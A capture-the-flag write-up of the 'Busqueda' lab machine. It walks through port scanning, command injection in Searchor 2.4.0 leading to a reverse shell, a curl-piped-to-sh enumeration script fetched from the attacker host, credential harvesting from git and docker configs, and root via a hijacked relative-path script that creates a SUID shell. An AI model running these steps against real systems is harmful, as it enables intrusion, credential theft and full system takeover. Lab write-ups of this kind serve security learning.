Busqueda

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.228.217:22
Open 10.129.228.217:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.217
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-24 18:54 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.01s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:54
Completed Parallel DNS resolution of 1 host. at 18:54, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:54
Scanning 10.129.228.217 [2 ports]
Discovered open port 80/tcp on 10.129.228.217
Discovered open port 22/tcp on 10.129.228.217
Completed Connect Scan at 18:54, 0.07s elapsed (2 total ports)
Initiating Service scan at 18:54
Scanning 2 services on 10.129.228.217
Completed Service scan at 18:54, 6.20s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.228.217.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 2.36s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.31s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.01s elapsed
Nmap scan report for 10.129.228.217
Host is up, received user-set (0.074s latency).
Scanned at 2024-11-24 18:54:10 UTC for 9s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
|   256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open  http    syn-ack Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:54
Completed NSE at 18:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds

HTTP (80)

The application allows us to search (?)

Writeup.png

Main endpoint is /search, if we include " there's output, but ' doesn't return anything.

Writeup-1.png
<p class="copyright">
  Powered by
  <a
    style="color: black"
    target="_blank"
    href="https://flask.palletsprojects.com"
    >Flask</a
  >
  and
  <a
    style="color: black"
    target="_blank"
    href="https://github.com/ArjunSharda/Searchor"
    >Searchor 2.4.0</a
  >
</p>

RCE

Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

└─$ git clone https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection.git
└─$ bash Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection/exploit.sh http://searcher.htb/ 10.10.14.42 4444
...
Writeup-2.png

Reverse Shell

svc@busqueda:/var/www/app$ id
uid=1000(svc) gid=1000(svc) groups=1000(svc)

User.txt

svc@busqueda:~$ cat user.txt
699a3f07b499c6bd4fbe33ddeb5cc34c

Privilege Escalation

Upgrade shell to SSH:

└─$ ssh-keygen -f id_rsa -P x -q
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINC9MDaxPorytmkFkFBCWa95kksRBqlAwfXNOycqlPRe woyag@kraken
---
svc@busqueda:~$ mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINC9MDaxPorytmkFkFBCWa95kksRBqlAwfXNOycqlPRe woyag@kraken' > ~/.ssh/authorized_keys
---
└─$ ssh svc@searcher.htb -i id_rsa

Gitea is running locally on port 3000

svc@busqueda:~$ ss -utnlp4
Netid          State           Recv-Q          Send-Q                    Local Address:Port                      Peer Address:Port          Process
udp            UNCONN          0               0                         127.0.0.53%lo:53                             0.0.0.0:*
udp            UNCONN          0               0                               0.0.0.0:68                             0.0.0.0:*
tcp            LISTEN          0               4096                      127.0.0.53%lo:53                             0.0.0.0:*
tcp            LISTEN          0               128                             0.0.0.0:22                             0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:3000                           0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:222                            0.0.0.0:*
tcp            LISTEN          0               128                           127.0.0.1:5000                           0.0.0.0:*              users:(("python3",pid=1547,fd=6),("python3",pid=1547,fd=4))
tcp            LISTEN          0               4096                          127.0.0.1:3306                           0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:40683                          0.0.0.0:*

Enumerate with linpeas

svc@busqueda:~$ curl 10.10.14.42/lp.sh|sh|tee lp.log
...
══╣ PHP exec extensions
...
lrwxrwxrwx 1 root root 35 Dec  1  2022 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:5000/
        ProxyPassReverse / http://127.0.0.1:5000/
        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^searcher.htb$
        RewriteRule /.* http://searcher.htb/ [R]
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName gitea.searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:3000/
        ProxyPassReverse / http://127.0.0.1:3000/
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
...
╔══════════╣ Analyzing Github Files (limit 70)
...
-rw-rw-r-- 1 svc svc 109 Nov 24 19:03 /home/svc/.gitconfig
[user]
        email = cody@searcher.htb
        name = cody
[core]
        hooksPath = no-hooks
[safe]
        directory = /var/www/app

drwxr-x--- 8 root root 4096 Apr  3  2023 /opt/scripts/.git
drwxr-xr-x 8 www-data www-data 4096 Nov 24 18:52 /var/www/app/.git

Check opt. No read permissions, only execute.

svc@busqueda:/opt/scripts$ ls -alh
total 28K
drwxr-xr-x 3 root root 4.0K Dec 24  2022 .
drwxr-xr-x 4 root root 4.0K Mar  1  2023 ..
-rwx--x--x 1 root root  586 Dec 24  2022 check-ports.py
-rwx--x--x 1 root root  857 Dec 24  2022 full-checkup.sh
drwxr-x--- 8 root root 4.0K Apr  3  2023 .git
-rwx--x--x 1 root root 3.3K Dec 24  2022 install-flask.sh
-rwx--x--x 1 root root 1.9K Dec 24  2022 system-checkup.py

If we go back to the app we can retrieve git credentials and find cody's password.

svc@busqueda:/var/www/app$ git config --list
user.email=cody@searcher.htb
user.name=cody
core.hookspath=no-hooks
safe.directory=/var/www/app
core.repositoryformatversion=0
core.filemode=true
core.bare=false
core.logallrefupdates=true
remote.origin.url=http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
remote.origin.fetch=+refs/heads/*:refs/remotes/origin/*
branch.main.remote=origin
branch.main.merge=refs/heads/main

Port forward Gitea

└─$ ssh svc@searcher.htb -i id_rsa -L 3000:0:3000
Writeup-3.png

Nothing there, but this password belongs to svc Linux user:

svc@busqueda:/var/www/app$ sudo -l
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py .
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup
     
svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED         STATUS          PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   22 months ago   Up 35 minutes   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   22 months ago   Up 35 minutes   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

https://docs.docker.com/reference/cli/docker/inspect/

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea/gitea:latest
{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"sha256:934d81f1d0494b0ddfd08a1421735360ad394d4b9f4f419a87d3e2c51dfec10e","Volumes":{"/data":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}}

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' 960
{"Hostname":"960873171e2e","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["USER_UID=115","USER_GID=121","GITEA__database__DB_TYPE=mysql","GITEA__database__HOST=db:3306","GITEA__database__NAME=gitea","GITEA__database__USER=gitea","GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"gitea/gitea:latest","Volumes":{"/data":{},"/etc/localtime":{},"/etc/timezone":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"com.docker.compose.config-hash":"e9e6ff8e594f3a8c77b688e35f3fe9163fe99c66597b19bdd03f9256d630f515","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"docker","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/scripts/docker","com.docker.compose.service":"server","com.docker.compose.version":"1.29.2","maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}}

When we use container ID it shows more information (???)

1. "GITEA__database__USER=gitea",
2. "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",

We can now login as administrator on Gitea

Creds: administrator:yuiu1hoiu4i5ho1uh

Writeup-4.png

http://localhost:3000/administrator/scripts/src/branch/main/system-checkup.py

The full-checkup option seems to be running script from local directory and not /opt/scripts and we can take advantage of that.

Writeup-5.png
svc@busqueda:/tmp$ cd /tmp
echo -e '#!/bin/bash\ninstall -m 4777 /bin/bash /tmp/rootbash' > full-checkup.sh
chmod +x full-checkup.sh
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
/tmp/rootbash -p

[+] Done!
rootbash-5.1# id
uid=1000(svc) gid=1000(svc) euid=0(root) groups=1000(svc)

Root.txt

rootbash-5.1# cat root.txt
5c07065f231ea771d167f02aa0dfac31
PreviousBrokerNextClicker

Last updated